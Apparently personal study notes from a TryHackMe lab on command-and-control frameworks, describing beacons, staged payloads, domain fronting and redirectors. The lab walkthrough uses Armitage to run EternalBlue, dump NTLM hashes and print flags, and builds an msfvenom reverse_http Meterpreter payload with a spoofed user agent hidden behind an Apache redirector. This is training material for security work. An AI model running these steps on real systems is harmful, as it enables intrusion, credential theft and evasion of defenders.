Command and Control (C2) -manage compromised devices during an engagement and often help aid in lateral movement
Command and Control Framework -Almost all C2 frameworks require a special payload generator -eg. Metasploit → MSFVenom (payload generator)
C2 Server -serves as a hub for agents to call back to -agents will periodically reach out to C2 servers and wait for the operator’s commands
Agents / Payloads -Agent: program generated by the C2 framework that calls back to a listner on a C2 server -configurable with adjustments on timing of how often C2 agents becon out to a Listener on a C2 Server and more
Listeners -application running on C2 server that waits for a callback
Beacons -process of a C2 Agent calling back to the listner running on a C2 Server
Obfuscating Agent Callbacks -Sleep Timers: C2 traffic beaconing rate forms a pattern forming a sleep timer -Jitter: takes sleep timer and adds variation - create normal traffic apperance
Payload Types -Staged and Stageless payloads -Stageless Payloads: A. Victim workstation downloads and executes the Dropper B. The beaconing to the C2 Server begins
-Staged: requires additional files from the C2 Server A. Victim workstation downloads and executes the Dropper B. Dropper calls back to C2 Server for Stage 2 C. C2 Server receives message and sends Stage 2 to victim workstation D. Stage 2 is loaded into memory of victim workstation E. The beconing to the C2 Server begins
Payload Formats:
- PowerShell Scripts
- HTA Files
- JS files
- Visual Basic Apps/Scripts
- MS Office Docs
Modules -Written in multiple languages, give more flexibility -Post Exploitation Modules: modules after inital compromise. Eg. finding paths for lateral movement and parsing credentials etc -Pivoting Modules: SMB pivot to communicate with restricted network segment from computer with admin access
Domain Fronting -utilize a good host -make it appear a workstation is communicating with a known, trusted IP address -victim only communicates with trusted site -commands are proxied through trusted site to the victim stations
C2 Profiles -Server looks at user agent to determine if HTTp request came from a becon or other device -if from a compromised device, it returns a C2 command -if from a non compromised device, it returns normal webpage https://blog.zsec.uk/cobalt-strike-profiles/ - C2 Profiles
Common C2 Frameworks -free frameworks are well understood, and signatures can be easily developed.
Free C2 Frameworks
- Metasploit - developed by Rapid7 - most popuar exploit and post-exploitation framework
- Armitage - extension of metasploit - adds a GUI - written in Java - fast and easy
- Powershell Empire/Starkiller - developed by the Veris Group - updated by BC Security team - versitile (THM ROOM )
- Covenant - developed by Ryan Cobb - written in C# - used in Post-exploit and lateral movement w/ HTTP, HTTPS, SMB
- Silver - developed by Bishop Fox - written in Go - various protocols for communication - mask communications and encrypted communication
Paid C2 Frameworks
- Cobalt Strike - developed by Help Systems Raphael Mudge - written in Java - flexible
- Brute Ratel - developed by Chetan Nayak - customizable command and control center
Other C2 Frameworks
- C2 Matrix - developed by Jorge Orchilles and Bryson Bort
Setting up Armitage
- git clone https://gitlab.com/kalilinux/packages/armitage.git
- cd armitage
- bash package.sh
Teamserver - takes IP address and Shared Password arguments Armitage - enter host, port, username, password
preparing env systemctl start postgresqul && stemctl status postgresql msfdb —use-defaults delete msfdb —use-defaults init
connecting to Armitage
cd /artimage/release/unix && ./teamserver
Accessing and managing your C2 infrastructure -SSH port-forwarding
Standard: TCP or UDP HTTP/HTTPS: firewall with protocol inspection, Domain fronting or malleable c2 profiles DNS: device that cannont easily access internet; - https://2017.zeronights.org/wp-content/uploads/materials/ZN17_SintsovAndreyanov_MeterpreterReverseDNS.pdf SMB: flexible pivoting, accessing restricted network segment
AttackBox
-
Setup systemctl start postgresql && systemctl status postgresql su ubuntu msfdb —use-defaults delete msfdb —use-defaults init cd /opt/armitage/release/unix ./teamserver [yourAttackBoxIP] [password] - (returns info) ./armitage (enter info returned above)
-
Scan Hosts > Nmap Scan > Quick Scan > [IP Ted-PC/32]
-
Exploit exploit > windows > smb > ms17_010_eternalblue
-
Post Exploit post > multi > manage > shell_to_meterpreter
Meterpreter shell - right click > Meterpreter 2 > Interact > Meterpreter Shell cd /users/ cd Administartor/Desktop cat root.txt > flag#1 THM{bd6ea6c871dced619876321081132744}
cd /users/Ted/Desktop cat user.txt > flag#3 THM{217fa45e35f8353ffd04cfc0be28e760}
Dump Hashes > right click > Meterpreter 2 > Access > Dump Hashes > Registry method Administartor NTLM Hash flag#2: c1565d108721c5626a6a054d6e0943c Ted NTLM Hash flag#4: 2e2618f266da8867e5664425c1309a5c
Advanced C2 Setups
Redirector -redirects http/https requests based on information within the http request body -runs Apache 2 or NGINX -setting up firewall to only allow communication to and from redirectors mitigates any potential risks
Setup Apache 2 -module: “mod_rewrite” -allows to form rules to forward requests to internal or external hosts on a server based on specific HTTP headers or content -modules needed: rewrite, proxy, proxy_http and headers
apt install apache2 a2enmod rewrite && a2enmod proxy && a2enmod proxy_http && a2enmod headers && systemctl start apache2 && systemctl status apache2
-using meterpreter - threat actor to make a slight adjustment to the user-agent in C2 http/https payloads -The HTTP request might get overlooked if the are similar
root@kali$ msfvenom -p windows/meterpreter/reverse_http LHOST=tun0 LPORT=80 HttpUserAgent=NotMeterpreter -f exe -o shell.exe
Modifying Apache config file -location on Debian based systems cat /etc/apache2/sites-available/000-default.conf | grep -v ’#’
Mod rewrite documentation: https://httpd.apache.org/docs/2.4/mod/mod_rewrite.html add: RewriteEngine On add: RewriteCond %{HTTP_USER_AGENT} “^NotMeterpreter$”
Setting up Exploit/Multi/Handler -LHOST: public IP -LPORT: port chosen -ReverseListenerBindAddress: IP -ReverseListenerBindPort: Port -OverrideLHOST: redirector’s IP -OverrideLPORT: redirector’s port -HttpUserAgent: NotMeterpreter -OverrideRequestHost: true run
What setting name that allows you to modify the User Agent field in a Meterpreter payload? HTTPUSERAGENT
What setting name that allows you to modify the Host header in a Meterpreter payload? HttpHostHeader